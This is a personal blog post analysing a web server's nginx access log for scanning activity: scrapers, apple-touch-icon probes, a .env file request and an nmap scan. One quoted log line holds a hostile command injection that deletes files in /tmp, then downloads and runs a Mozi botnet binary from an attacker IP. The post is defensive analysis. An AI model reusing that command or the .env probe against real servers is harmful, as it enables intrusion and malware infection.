<!DOCTYPE html>
<html>
  <head>
  <link rel="stylesheet"
        href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/10.1.1/styles/default.min.css">

  <meta name="keywords" content="shyal beardsley, shyal.com, shyal, oliver, beardsley">
  <meta name="description" content="vulnerability scanning techniques">
  <script async src="https://cdn.jsdelivr.net/npm/mathjax@2/MathJax.js"></script>
  <script type="text/x-mathjax-config">
  MathJax.Hub.Config({
    config: ["MMLorHTML.js"],
    jax: ["input/TeX", "output/HTML-CSS", "output/NativeMML"],
    extensions: ["MathMenu.js", "MathZoom.js"]
  });
  </script>

  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

<!--   <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
  <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script> -->
  <script src="https://cdnjs.cloudflare.com/ajax/libs/mermaid/8.5.2/mermaid.min.js"></script>
  <script src="https://code.jquery.com/jquery-3.5.1.slim.js"></script>
    
    <link rel="stylesheet" href="/static/styles.css">
    <!-- <script src="/static/mermaid.min.js"></script> -->
    <link href="/static/lightbox.css" rel="stylesheet" />
    
    <title>vulnerability scanning techniques - Shyal Beardsley</title>
    <style>
      pre { line-height: 125%; }
td.linenos pre { color: #000000; background-color: #f0f0f0; padding-left: 5px; padding-right: 5px; }
span.linenos { color: #000000; background-color: #f0f0f0; padding-left: 5px; padding-right: 5px; }
td.linenos pre.special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }
span.linenos.special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }
.highlight .hll { background-color: #ffffcc }
.highlight { background: #ffffff; }
.highlight .c { color: #888888 } /* Comment */
.highlight .err { color: #a61717; background-color: #e3d2d2 } /* Error */
.highlight .k { color: #008800; font-weight: bold } /* Keyword */
.highlight .ch { color: #888888 } /* Comment.Hashbang */
.highlight .cm { color: #888888 } /* Comment.Multiline */
.highlight .cp { color: #cc0000; font-weight: bold } /* Comment.Preproc */
.highlight .cpf { color: #888888 } /* Comment.PreprocFile */
.highlight .c1 { color: #888888 } /* Comment.Single */
.highlight .cs { color: #cc0000; font-weight: bold; background-color: #fff0f0 } /* Comment.Special */
.highlight .gd { color: #000000; background-color: #ffdddd } /* Generic.Deleted */
.highlight .ge { font-style: italic } /* Generic.Emph */
.highlight .gr { color: #aa0000 } /* Generic.Error */
.highlight .gh { color: #333333 } /* Generic.Heading */
.highlight .gi { color: #000000; background-color: #ddffdd } /* Generic.Inserted */
.highlight .go { color: #888888 } /* Generic.Output */
.highlight .gp { color: #555555 } /* Generic.Prompt */
.highlight .gs { font-weight: bold } /* Generic.Strong */
.highlight .gu { color: #666666 } /* Generic.Subheading */
.highlight .gt { color: #aa0000 } /* Generic.Traceback */
.highlight .kc { color: #008800; font-weight: bold } /* Keyword.Constant */
.highlight .kd { color: #008800; font-weight: bold } /* Keyword.Declaration */
.highlight .kn { color: #008800; font-weight: bold } /* Keyword.Namespace */
.highlight .kp { color: #008800 } /* Keyword.Pseudo */
.highlight .kr { color: #008800; font-weight: bold } /* Keyword.Reserved */
.highlight .kt { color: #888888; font-weight: bold } /* Keyword.Type */
.highlight .m { color: #0000DD; font-weight: bold } /* Literal.Number */
.highlight .s { color: #dd2200; background-color: #fff0f0 } /* Literal.String */
.highlight .na { color: #336699 } /* Name.Attribute */
.highlight .nb { color: #003388 } /* Name.Builtin */
.highlight .nc { color: #bb0066; font-weight: bold } /* Name.Class */
.highlight .no { color: #003366; font-weight: bold } /* Name.Constant */
.highlight .nd { color: #555555 } /* Name.Decorator */
.highlight .ne { color: #bb0066; font-weight: bold } /* Name.Exception */
.highlight .nf { color: #0066bb; font-weight: bold } /* Name.Function */
.highlight .nl { color: #336699; font-style: italic } /* Name.Label */
.highlight .nn { color: #bb0066; font-weight: bold } /* Name.Namespace */
.highlight .py { color: #336699; font-weight: bold } /* Name.Property */
.highlight .nt { color: #bb0066; font-weight: bold } /* Name.Tag */
.highlight .nv { color: #336699 } /* Name.Variable */
.highlight .ow { color: #008800 } /* Operator.Word */
.highlight .w { color: #bbbbbb } /* Text.Whitespace */
.highlight .mb { color: #0000DD; font-weight: bold } /* Literal.Number.Bin */
.highlight .mf { color: #0000DD; font-weight: bold } /* Literal.Number.Float */
.highlight .mh { color: #0000DD; font-weight: bold } /* Literal.Number.Hex */
.highlight .mi { color: #0000DD; font-weight: bold } /* Literal.Number.Integer */
.highlight .mo { color: #0000DD; font-weight: bold } /* Literal.Number.Oct */
.highlight .sa { color: #dd2200; background-color: #fff0f0 } /* Literal.String.Affix */
.highlight .sb { color: #dd2200; background-color: #fff0f0 } /* Literal.String.Backtick */
.highlight .sc { color: #dd2200; background-color: #fff0f0 } /* Literal.String.Char */
.highlight .dl { color: #dd2200; background-color: #fff0f0 } /* Literal.String.Delimiter */
.highlight .sd { color: #dd2200; background-color: #fff0f0 } /* Literal.String.Doc */
.highlight .s2 { color: #dd2200; background-color: #fff0f0 } /* Literal.String.Double */
.highlight .se { color: #0044dd; background-color: #fff0f0 } /* Literal.String.Escape */
.highlight .sh { color: #dd2200; background-color: #fff0f0 } /* Literal.String.Heredoc */
.highlight .si { color: #3333bb; background-color: #fff0f0 } /* Literal.String.Interpol */
.highlight .sx { color: #22bb22; background-color: #f0fff0 } /* Literal.String.Other */
.highlight .sr { color: #008800; background-color: #fff0ff } /* Literal.String.Regex */
.highlight .s1 { color: #dd2200; background-color: #fff0f0 } /* Literal.String.Single */
.highlight .ss { color: #aa6600; background-color: #fff0f0 } /* Literal.String.Symbol */
.highlight .bp { color: #003388 } /* Name.Builtin.Pseudo */
.highlight .fm { color: #0066bb; font-weight: bold } /* Name.Function.Magic */
.highlight .vc { color: #336699 } /* Name.Variable.Class */
.highlight .vg { color: #dd7700 } /* Name.Variable.Global */
.highlight .vi { color: #3333bb } /* Name.Variable.Instance */
.highlight .vm { color: #336699 } /* Name.Variable.Magic */
.highlight .il { color: #0000DD; font-weight: bold } /* Literal.Number.Integer.Long */
      

      .MathJax_Display{
        /*text-align: left !important;*/
        margin: 0 !important;
      }

      pre {
      /*line-height: 1em;*/
      white-space: pre-wrap;       /* css-3 */
      white-space: -moz-pre-wrap;  /* Mozilla, since 1999 */
      white-space: -pre-wrap;      /* Opera 4-6 */
      white-space: -o-pre-wrap;    /* Opera 7 */
      word-wrap: break-word;       /* Internet Explorer 5.5+ */
      }

      div.mermaid {
        max-width: 500px;
      }
  
      body {
        text-align: left !important;
        margin: 0px;
        padding: 0px;
      }

      table {
        border-collapse: collapse;
        width: 100%;
      }

      .lineno {
        margin-right: 10px;
        color: #a5b4a3;
      }

      .linenodiv {
        border-left: 2px solid #69c;
        color: #89ac9a;
        background-color: #f5f7f9 !important;
      }

      .codehilitetable td {
        background-color: #f5f7f9;
      }

      th, td {
        text-align: left;
      }

      tr:nth-child(even) {background-color: #f2f2f2;}

      img {
        max-width: 50em;
        max-height: 30em;
        display: block;
        margin-left: auto;
        margin-right: auto;
        padding: 2em 1em;
      }

      .text-center{
        text-align: center;
      }

      main,
      footer,
      .narrow {
        font-family: "Roboto", "Helvetica", "Arial", sans-serif;
        margin: 0 auto;
        max-width: 50em;
        line-height: 1.5;
        padding: 2em 1em;
        color: #566b78;
      }

      .lb-image {
        background: white;
      }

      div {
        padding: 0px;
        margin: 0px;
      }

      code,
      pre {
        background: #f7f9fb;
      }

      .linenodiv {
        width: 10px;
        padding-right: 0px;
      }

      h2 {
        margin-top: 0.5em;
        padding-top: 0.5em;
      }

      h1,
      h2,
      strong {
        color: #333;
      }

      a {
        color: #e81c4f;
      }
    </style>
  </head>
  <body>
    
    <main>

    <!-- <img src='/Attachments/me.png' height='150px'> -->

    
    <div><h1 class='main-title'>vulnerability scanning techniques</h1></div>
     

    
    <a href="javascript:history.back()">←</a>
    <a href='/'>🏠</a>
     
    <!-- if has_fences -->
    <!-- <div><a href='/black'><img src='/Attachments/black.svg'/></a></div> -->
    <!--  end  -->
    <h2 id="varlognginxaccesslog">/var/log/nginx/access.log</h2>
<p>The nginx access log don't show anything too wildly interesting, but let's go through some of the entries at that time:</p>
<div class="highlight"><pre><span></span><span class="linenos">1</span><span class="mf">35.222</span><span class="o">.</span><span class="mf">157.169</span> <span class="o">-</span> <span class="o">-</span> <span class="p">[</span><span class="mi">25</span><span class="o">/</span><span class="n">Sep</span><span class="o">/</span><span class="mi">2020</span><span class="p">:</span><span class="mi">21</span><span class="p">:</span><span class="mi">08</span><span class="p">:</span><span class="mi">38</span> <span class="o">+</span><span class="mi">0000</span><span class="p">]</span> <span class="s2">&quot;GET /robots.txt HTTP/1.1&quot;</span> <span class="mi">301</span> <span class="mi">194</span> <span class="s2">&quot;-&quot;</span> <span class="s2">&quot;shopify-partner-homepage-scraper&quot;</span>
<span class="linenos">2</span><span class="mf">35.222</span><span class="o">.</span><span class="mf">157.169</span> <span class="o">-</span> <span class="o">-</span> <span class="p">[</span><span class="mi">25</span><span class="o">/</span><span class="n">Sep</span><span class="o">/</span><span class="mi">2020</span><span class="p">:</span><span class="mi">21</span><span class="p">:</span><span class="mi">08</span><span class="p">:</span><span class="mi">39</span> <span class="o">+</span><span class="mi">0000</span><span class="p">]</span> <span class="s2">&quot;GET /robots.txt HTTP/1.1&quot;</span> <span class="mi">200</span> <span class="mi">22</span> <span class="s2">&quot;-&quot;</span> <span class="s2">&quot;shopify-partner-homepage-scraper&quot;</span>
<span class="linenos">3</span><span class="mf">35.222</span><span class="o">.</span><span class="mf">157.169</span> <span class="o">-</span> <span class="o">-</span> <span class="p">[</span><span class="mi">25</span><span class="o">/</span><span class="n">Sep</span><span class="o">/</span><span class="mi">2020</span><span class="p">:</span><span class="mi">21</span><span class="p">:</span><span class="mi">08</span><span class="p">:</span><span class="mi">39</span> <span class="o">+</span><span class="mi">0000</span><span class="p">]</span> <span class="s2">&quot;GET / HTTP/1.1&quot;</span> <span class="mi">301</span> <span class="mi">194</span> <span class="s2">&quot;-&quot;</span> <span class="s2">&quot;shopify-partner-homepage-scraper&quot;</span>
<span class="linenos">4</span><span class="mf">35.222</span><span class="o">.</span><span class="mf">157.169</span> <span class="o">-</span> <span class="o">-</span> <span class="p">[</span><span class="mi">25</span><span class="o">/</span><span class="n">Sep</span><span class="o">/</span><span class="mi">2020</span><span class="p">:</span><span class="mi">21</span><span class="p">:</span><span class="mi">08</span><span class="p">:</span><span class="mi">40</span> <span class="o">+</span><span class="mi">0000</span><span class="p">]</span> <span class="s2">&quot;GET / HTTP/1.1&quot;</span> <span class="mi">200</span> <span class="mi">527</span> <span class="s2">&quot;-&quot;</span> <span class="s2">&quot;shopify-partner-homepage-scraper&quot;</span>
</pre></div>

<p><a href="https://github.com/matomo-org/device-detector/issues/6082">shopify-partner-homepage-scraper</a> seems innocuous enough, though the information regarding it is scant at best. If i had to put an opsec tinfoil hat on, the first step hackers trying to intrude a webserver would take is information gathering, and scraping for files containing usernames, and any information relating to third party applications such as shopify would provide possible intrusion vectors.</p>
<p>But that's really simply because i have my opsec tinfoil hat on. As this <a href="http://www.ysolutions.at/stats/usage_201801.html">server-log</a> for ysolutions.at shows, <code>shopify-parner-homepage-scraper</code> represents 1.34% of their total traffic. So this shopify bot randomly trawling the internet for shopify sites is also likely, but this entry is still noteworthy.</p>
<div class="highlight"><pre><span></span><span class="linenos">1</span><span class="mf">83.135</span><span class="o">.</span><span class="mf">136.179</span> <span class="o">-</span> <span class="o">-</span> <span class="p">[</span><span class="mi">25</span><span class="o">/</span><span class="n">Sep</span><span class="o">/</span><span class="mi">2020</span><span class="p">:</span><span class="mi">21</span><span class="p">:</span><span class="mi">49</span><span class="p">:</span><span class="mi">56</span> <span class="o">+</span><span class="mi">0000</span><span class="p">]</span> <span class="s2">&quot;GET / HTTP/1.1&quot;</span> <span class="mi">301</span> <span class="mi">194</span> <span class="s2">&quot;-&quot;</span> <span class="s2">&quot;Reeder/4020.79.01 CFNetwork/1197 Darwin/20.0.0&quot;</span>
<span class="linenos">2</span><span class="mf">83.135</span><span class="o">.</span><span class="mf">136.179</span> <span class="o">-</span> <span class="o">-</span> <span class="p">[</span><span class="mi">25</span><span class="o">/</span><span class="n">Sep</span><span class="o">/</span><span class="mi">2020</span><span class="p">:</span><span class="mi">21</span><span class="p">:</span><span class="mi">49</span><span class="p">:</span><span class="mi">56</span> <span class="o">+</span><span class="mi">0000</span><span class="p">]</span> <span class="s2">&quot;GET / HTTP/1.1&quot;</span> <span class="mi">200</span> <span class="mi">527</span> <span class="s2">&quot;-&quot;</span> <span class="s2">&quot;Reeder/4020.79.01 CFNetwork/1197 Darwin/20.0.0&quot;</span>
<span class="linenos">3</span><span class="mf">83.135</span><span class="o">.</span><span class="mf">136.179</span> <span class="o">-</span> <span class="o">-</span> <span class="p">[</span><span class="mi">25</span><span class="o">/</span><span class="n">Sep</span><span class="o">/</span><span class="mi">2020</span><span class="p">:</span><span class="mi">21</span><span class="p">:</span><span class="mi">49</span><span class="p">:</span><span class="mi">56</span> <span class="o">+</span><span class="mi">0000</span><span class="p">]</span> <span class="s2">&quot;HEAD /favicon.ico HTTP/1.1&quot;</span> <span class="mi">301</span> <span class="mi">0</span> <span class="s2">&quot;-&quot;</span> <span class="s2">&quot;Reeder/4020.79.01 CFNetwork/1197 Darwin/20.0.0&quot;</span>
<span class="linenos">4</span><span class="mf">83.135</span><span class="o">.</span><span class="mf">136.179</span> <span class="o">-</span> <span class="o">-</span> <span class="p">[</span><span class="mi">25</span><span class="o">/</span><span class="n">Sep</span><span class="o">/</span><span class="mi">2020</span><span class="p">:</span><span class="mi">21</span><span class="p">:</span><span class="mi">49</span><span class="p">:</span><span class="mi">56</span> <span class="o">+</span><span class="mi">0000</span><span class="p">]</span> <span class="s2">&quot;HEAD /favicon.ico HTTP/1.1&quot;</span> <span class="mi">404</span> <span class="mi">0</span> <span class="s2">&quot;-&quot;</span> <span class="s2">&quot;Reeder/4020.79.01 CFNetwork/1197 Darwin/20.0.0&quot;</span>
<span class="linenos">5</span><span class="mf">83.135</span><span class="o">.</span><span class="mf">136.179</span> <span class="o">-</span> <span class="o">-</span> <span class="p">[</span><span class="mi">25</span><span class="o">/</span><span class="n">Sep</span><span class="o">/</span><span class="mi">2020</span><span class="p">:</span><span class="mi">21</span><span class="p">:</span><span class="mi">49</span><span class="p">:</span><span class="mi">56</span> <span class="o">+</span><span class="mi">0000</span><span class="p">]</span> <span class="s2">&quot;HEAD /apple-touch-icon.png HTTP/1.1&quot;</span> <span class="mi">301</span> <span class="mi">0</span> <span class="s2">&quot;-&quot;</span> <span class="s2">&quot;Reeder/4020.79.01 CFNetwork/1197 Darwin/20.0.0&quot;</span>
<span class="linenos">6</span><span class="mf">83.135</span><span class="o">.</span><span class="mf">136.179</span> <span class="o">-</span> <span class="o">-</span> <span class="p">[</span><span class="mi">25</span><span class="o">/</span><span class="n">Sep</span><span class="o">/</span><span class="mi">2020</span><span class="p">:</span><span class="mi">21</span><span class="p">:</span><span class="mi">49</span><span class="p">:</span><span class="mi">56</span> <span class="o">+</span><span class="mi">0000</span><span class="p">]</span> <span class="s2">&quot;HEAD /apple-touch-icon.png HTTP/1.1&quot;</span> <span class="mi">405</span> <span class="mi">0</span> <span class="s2">&quot;-&quot;</span> <span class="s2">&quot;Reeder/4020.79.01 CFNetwork/1197 Darwin/20.0.0&quot;</span>
<span class="linenos">7</span><span class="mf">83.135</span><span class="o">.</span><span class="mf">136.179</span> <span class="o">-</span> <span class="o">-</span> <span class="p">[</span><span class="mi">25</span><span class="o">/</span><span class="n">Sep</span><span class="o">/</span><span class="mi">2020</span><span class="p">:</span><span class="mi">21</span><span class="p">:</span><span class="mi">49</span><span class="p">:</span><span class="mi">56</span> <span class="o">+</span><span class="mi">0000</span><span class="p">]</span> <span class="s2">&quot;HEAD /apple-touch-icon-precomposed.png HTTP/1.1&quot;</span> <span class="mi">301</span> <span class="mi">0</span> <span class="s2">&quot;-&quot;</span> <span class="s2">&quot;Reeder/4020.79.01 CFNetwork/1197 Darwin/20.0.0&quot;</span>
<span class="linenos">8</span><span class="mf">83.135</span><span class="o">.</span><span class="mf">136.179</span> <span class="o">-</span> <span class="o">-</span> <span class="p">[</span><span class="mi">25</span><span class="o">/</span><span class="n">Sep</span><span class="o">/</span><span class="mi">2020</span><span class="p">:</span><span class="mi">21</span><span class="p">:</span><span class="mi">49</span><span class="p">:</span><span class="mi">57</span> <span class="o">+</span><span class="mi">0000</span><span class="p">]</span> <span class="s2">&quot;HEAD /apple-touch-icon-precomposed.png HTTP/1.1&quot;</span> <span class="mi">405</span> <span class="mi">0</span> <span class="s2">&quot;-&quot;</span> <span class="s2">&quot;Reeder/4020.79.01 CFNetwork/1197 Darwin/20.0.0&quot;</span>
</pre></div>

<p>The above entries are strange! They occured exactly at the time of the IP attack. The useragent is <code>CFNetwork/1197 Darwin/20.0.0</code>. This is the UA for <code>Darwin 20.0.0 June 22, 2020 macOS Big Sur iOS 14 macOS 11.0 beta 1 and iOS 14.0 beta 1</code> <a href="https://en.wikipedia.org/wiki/Darwin_(operating_system)">source</a>. This is neither the version running on my macbook, ipad, or iphone.</p>
<p>This is a scan for the <a href="https://web.dev/apple-touch-icon/">IOS Homescreen</a> which is obviously phishing for a vulnerability of sorts. Even i haven't added either of these sites to my IOS homescreen.</p>
<div class="highlight"><pre><span></span><span class="linenos">1</span><span class="mf">66.42</span><span class="o">.</span><span class="mf">42.3</span> <span class="o">-</span> <span class="o">-</span> <span class="p">[</span><span class="mi">25</span><span class="o">/</span><span class="n">Sep</span><span class="o">/</span><span class="mi">2020</span><span class="p">:</span><span class="mi">21</span><span class="p">:</span><span class="mi">53</span><span class="p">:</span><span class="mi">34</span> <span class="o">+</span><span class="mi">0000</span><span class="p">]</span> <span class="s2">&quot;GET /.env HTTP/1.1&quot;</span> <span class="mi">401</span> <span class="mi">606</span> <span class="s2">&quot;-&quot;</span> <span class="s2">&quot;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36&quot;</span>
<span class="linenos">2</span><span class="mf">66.42</span><span class="o">.</span><span class="mf">42.3</span> <span class="o">-</span> <span class="o">-</span> <span class="p">[</span><span class="mi">25</span><span class="o">/</span><span class="n">Sep</span><span class="o">/</span><span class="mi">2020</span><span class="p">:</span><span class="mi">21</span><span class="p">:</span><span class="mi">53</span><span class="p">:</span><span class="mi">35</span> <span class="o">+</span><span class="mi">0000</span><span class="p">]</span> <span class="s2">&quot;POST / HTTP/1.1&quot;</span> <span class="mi">401</span> <span class="mi">606</span> <span class="s2">&quot;-&quot;</span> <span class="s2">&quot;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36&quot;</span>
</pre></div>

<p>A get request for a <code>.env</code> is becoming highly suspicious. Basically trying to get information about my environment variables, in case my site is running from my home directory.</p>
<div class="highlight"><pre><span></span><span class="linenos">1</span><span class="mf">172.105</span><span class="o">.</span><span class="mf">89.161</span> <span class="o">-</span> <span class="o">-</span> <span class="p">[</span><span class="mi">25</span><span class="o">/</span><span class="n">Sep</span><span class="o">/</span><span class="mi">2020</span><span class="p">:</span><span class="mi">22</span><span class="p">:</span><span class="mi">02</span><span class="p">:</span><span class="mi">46</span> <span class="o">+</span><span class="mi">0000</span><span class="p">]</span> <span class="s2">&quot;POST /ajax HTTP/1.1&quot;</span> <span class="mi">404</span> <span class="mi">209</span> <span class="s2">&quot;-&quot;</span> <span class="s2">&quot;Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36&quot;</span>
</pre></div>

<p>Here we have an obvious spam abuse entry, from a <a href="https://www.abuseipdb.com/check/172.105.89.161">known spammy IP address</a>.</p>
<div class="highlight"><pre><span></span><span class="linenos">1</span><span class="mf">119.185</span><span class="o">.</span><span class="mf">231.105</span> <span class="o">-</span> <span class="o">-</span> <span class="p">[</span><span class="mi">25</span><span class="o">/</span><span class="n">Sep</span><span class="o">/</span><span class="mi">2020</span><span class="p">:</span><span class="mi">22</span><span class="p">:</span><span class="mi">04</span><span class="p">:</span><span class="mi">06</span> <span class="o">+</span><span class="mi">0000</span><span class="p">]</span> <span class="s2">&quot;GET /shell?cd+/tmp;rm+-rf+*;wget+http://119.185.231.105:56819/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1&quot;</span> <span class="mi">404</span> <span class="mi">178</span> <span class="s2">&quot;-&quot;</span> <span class="s2">&quot;Hello, world&quot;</span>
</pre></div>

<p>Here we have an attempt to run a shell command via a get request? Doing an rm -rf in my /tmp/ folder with UA "hello world". It could be entries like this one that triggered my webhost to filter the requests.</p>
<div class="highlight"><pre><span></span><span class="linenos">1</span><span class="mf">47.92</span><span class="o">.</span><span class="mf">204.164</span> <span class="o">-</span> <span class="o">-</span> <span class="p">[</span><span class="mi">25</span><span class="o">/</span><span class="n">Sep</span><span class="o">/</span><span class="mi">2020</span><span class="p">:</span><span class="mi">22</span><span class="p">:</span><span class="mi">07</span><span class="p">:</span><span class="mi">30</span> <span class="o">+</span><span class="mi">0000</span><span class="p">]</span> <span class="s2">&quot;GET / HTTP/1.0&quot;</span> <span class="mi">200</span> <span class="mi">6289</span> <span class="s2">&quot;-&quot;</span> <span class="s2">&quot;-&quot;</span>
<span class="linenos">2</span><span class="mf">47.92</span><span class="o">.</span><span class="mf">204.164</span> <span class="o">-</span> <span class="o">-</span> <span class="p">[</span><span class="mi">25</span><span class="o">/</span><span class="n">Sep</span><span class="o">/</span><span class="mi">2020</span><span class="p">:</span><span class="mi">22</span><span class="p">:</span><span class="mi">07</span><span class="p">:</span><span class="mi">37</span> <span class="o">+</span><span class="mi">0000</span><span class="p">]</span> <span class="s2">&quot;GET /nmaplowercheck1601071656 HTTP/1.1&quot;</span> <span class="mi">400</span> <span class="mi">280</span> <span class="s2">&quot;-&quot;</span> <span class="s2">&quot;Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)&quot;</span>
<span class="linenos">3</span><span class="mf">47.92</span><span class="o">.</span><span class="mf">204.164</span> <span class="o">-</span> <span class="o">-</span> <span class="p">[</span><span class="mi">25</span><span class="o">/</span><span class="n">Sep</span><span class="o">/</span><span class="mi">2020</span><span class="p">:</span><span class="mi">22</span><span class="p">:</span><span class="mi">07</span><span class="p">:</span><span class="mi">37</span> <span class="o">+</span><span class="mi">0000</span><span class="p">]</span> <span class="s2">&quot;GET / HTTP/1.0&quot;</span> <span class="mi">400</span> <span class="mi">280</span> <span class="s2">&quot;-&quot;</span> <span class="s2">&quot;-&quot;</span>
<span class="linenos">4</span><span class="mf">47.92</span><span class="o">.</span><span class="mf">204.164</span> <span class="o">-</span> <span class="o">-</span> <span class="p">[</span><span class="mi">25</span><span class="o">/</span><span class="n">Sep</span><span class="o">/</span><span class="mi">2020</span><span class="p">:</span><span class="mi">22</span><span class="p">:</span><span class="mi">07</span><span class="p">:</span><span class="mi">38</span> <span class="o">+</span><span class="mi">0000</span><span class="p">]</span> <span class="s2">&quot;GET / HTTP/1.1&quot;</span> <span class="mi">200</span> <span class="mi">6289</span> <span class="s2">&quot;-&quot;</span> <span class="s2">&quot;-&quot;</span>
<span class="linenos">5</span><span class="mf">47.92</span><span class="o">.</span><span class="mf">204.164</span> <span class="o">-</span> <span class="o">-</span> <span class="p">[</span><span class="mi">25</span><span class="o">/</span><span class="n">Sep</span><span class="o">/</span><span class="mi">2020</span><span class="p">:</span><span class="mi">22</span><span class="p">:</span><span class="mi">07</span><span class="p">:</span><span class="mi">51</span> <span class="o">+</span><span class="mi">0000</span><span class="p">]</span> <span class="s2">&quot;GET / HTTP/1.1&quot;</span> <span class="mi">200</span> <span class="mi">2130</span> <span class="s2">&quot;-&quot;</span> <span class="s2">&quot;-&quot;</span>
</pre></div>

<p>Here we have an IP scanning my host with <a href="https://security.stackexchange.com/questions/148953/on-company-intranet-yet-web-server-picked-up-url-scanning-type-requests">nmap</a>. An <a href="https://www.abuseipdb.com/check/47.92.204.164">abusive chinese IP</a>.</p>
<hr />
<p>So the next logical question to ask, before being able to ascertain whether i'm under attack, is to ask is how common are these requests? My access logs only go back 12 days:</p>
<ul>
<li>nmap scans were performed evenly throughout.</li>
<li>shopify-partner-homepage-scraper were also performed throughout.</li>
<li>apple-touch-icon-precomposed.png requests were performed evenly throughout.</li>
<li>.env requests were performed evenly throughout.</li>
<li>?shell requests were performed throughout.</li>
</ul>
<h2 id="nginx-access-log-do-not-show-anything-too-suspicious-besides-83135136179">nginx access log do not show anything too suspicious, besides 83.135.136.179</h2>
<p>I'm having a hard time tuning into any signal, mostly seems like noise. So i'll have to really focus on the address accessing my site at the exact time of the attack: 83.135.136.179. The IP belongs to <a href="https://ipinfo.io/AS8881/83.135.128.0/20-83.135.136.128/25">1&amp;1 Versatel Deutschland GmbH</a>, whose headquarters are based in Berlin.</p>
    </main>
    
    <footer>
        All content rights reserved Shyal Beardsley 2020.
    </footer>
    
  </body>


<script>
 var i = 0;
 $("img").each(function() {  
   imgsrc = this.src;

  if (imgsrc.includes('.mp4')){
    $(this).replaceWith($("<video width='640' height='480' controls> <source src='"+imgsrc+"' type='video/mp4'></video>"))
   }
   else{
     $(this).wrap('<a href="'+this.src+'" data-lightbox="image-'+i+'" data-title=""></a>');
   }
   i += 1;
  });  
</script>

<script src="/static/lightbox.js"></script>
<script>
lightbox.option({
  'resizeDuration': 200,
  'wrapAround': true,
  'fitImagesInViewport': true
})
</script>

<script async src="https://www.googletagmanager.com/gtag/js?id=UA-78427660-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());
  gtag('config', 'UA-78427660-1');
</script>

</html>